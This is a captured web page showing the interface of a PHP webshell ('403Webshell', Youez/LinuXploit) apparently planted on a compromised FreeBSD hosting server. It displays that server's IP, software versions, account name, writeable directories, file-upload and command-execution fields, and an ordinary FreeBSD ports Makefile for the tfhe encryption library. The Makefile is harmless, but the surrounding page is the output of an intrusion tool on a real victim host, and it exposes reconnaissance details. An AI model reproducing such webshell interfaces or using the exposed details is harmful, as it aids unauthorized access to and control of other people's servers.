403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/security/tfhe/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/security/tfhe/Makefile
PORTNAME=	tfhe
DISTVERSIONPREFIX=	v
DISTVERSION=	1.0.1-30
DISTVERSIONSUFFIX=	-ga085efe
CATEGORIES=	security

MAINTAINER=	yuri@FreeBSD.org
COMMENT=	Fast Fully Homomorphic Encryption (FHE) library over the Torus
WWW=		https://github.com/tfhe/tfhe

LICENSE=	APACHE20
LICENSE_FILE=	${WRKSRC}/LICENSE

ONLY_FOR_ARCHS=	amd64 # because of arch-specific assembly

BUILD_DEPENDS=	cmake:devel/cmake-core
TEST_DEPENDS=	fftw3>0:math/fftw3 \
		googletest>0:devel/googletest

USES=		compiler:c++11-lang gmake localbase:ldflags
USE_GITHUB=	yes
USE_LDCONFIG=	yes

BINARY_ALIAS=	make=${GMAKE}

TEST_TARGET=	test # -avx and -fma will fail where no such hardware optimization is available

post-install:
	${STRIP_CMD} ${STAGEDIR}${PREFIX}/lib/lib*.so

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit